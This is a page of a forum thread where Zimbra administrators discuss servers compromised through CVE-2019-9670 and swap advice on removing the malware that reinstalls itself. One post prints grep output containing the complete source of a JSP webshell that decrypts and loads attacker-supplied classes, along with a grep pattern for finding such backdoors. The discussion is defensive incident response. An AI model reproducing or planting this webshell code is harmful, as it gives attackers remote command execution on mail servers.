Page 12 of 25

Re: CVE-2019-9670 being actively exploited

Posted: Mon May 27, 2019 8:00 pm
by Stemond11
Hi ng

My zimbra machine is compromised.
If i delete zmswatch script and zmswatch crontab after few hours the script returns .
How can i find the source malaware ?
How can i delete definitly the script?

Please help me. !!
Thanks Stefano

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 1:04 am
by tin
Have a read over the whole thread.... I'll give a few thoughts here, but this is not everything...

You've most likely got a cron job re-downloading the malicious script. There may also be malicious js files scattered through the jetty/webapps folders.

I found uninstalling wget and curl stopped the scripts working to reinfect. This may give you a better chance to clean things up, but they may also use other tricks.

Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.

Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimvra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 5:31 am
by maxxer
Stemond11 wrote:Hi ng
How can i find the source malaware ?
How can i delete definitly the script?


read the whole thread and/or the blogpost linked here, you will find guidelines on how to cleanup your system

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 7:35 am
by Stemond11
in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

In /tmp all request JSP like this every 30 seconds are in read-only:
WHY ??

<Configure class="org.eclipse.jetty.webapp.WebAppContext">
<Get name="securityHandler">
<Set name="loginService">
<New class="com.zimbra.cs.servlet.ZimbraLoginService">
<Set name="name">Zimbra</Set>
</New>
</Set>
<Set name="authenticatorFactory">
<New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
<Set name="urlPattern">//downloads/*</Set>
</New>
</Set>
</Get>
</Configure>

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 7:35 am
by maxxer
Stemond11 wrote:in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so on

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 7:42 am
by Stemond11
i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 8:00 am
by elby
maxxer wrote:
Stemond11 wrote:in previsious post it's posted ZMCAT solutions
I have zmswatch on crontab and after i delete/kill it , it's come back!

it's the same infection, just more widely spread on the system. cleanup steps are basically the same. first of all patch your system, then cleanup all the mess: cron, unwanted jsp and so on


After:
===


What should I clean up?
how to figure out what are the unwanted jsp files?

Thanks,

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 8:14 am
by AB_Zimbra
Stemond11 wrote:i have just delete Crontab
Where do i find unwanted jsp ?
here ? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

thank you
Stefano


The infection creates new jsp's and edits existing ones with "control code". This way the attacker can remotely execute commands on your comprimised system. Patching after infection is not enough, you need to find all those "backdoors" and remove them or replace them with the ones from the source (install packages).

Please read the blog on maxxer it's site, as he linked to at the start of this topic.

This might be hard if you're not an experienced sysadmin. Maybe this will help you to find those files:

Code: Select all

grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 8:18 am
by zimbraxtc
Hello all!

I have the same issue on a 8.6 Ubuntu.

- added patch
- clean /var/spool/cron/crontabs/zimbra (line at the end)
- clean /opt/zimbra/log/zmswatch and zmswatch.sh
- removed added email-accounts (only one)
- changed the admin-pass for zimbra-user
- cant find any strange .jsp-files.
- clean /opt/zimbra/data/tmp/.zmswatch.xxx files

zmswatch still popping up...

after cleaning like above zmswatch started without zimbra-server running.

Any ideas or thoughts about this?

Re: CVE-2019-9670 being actively exploited

Posted: Tue May 28, 2019 9:05 am
by mqaroush
[root@xxxx ]# grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));

What this mean???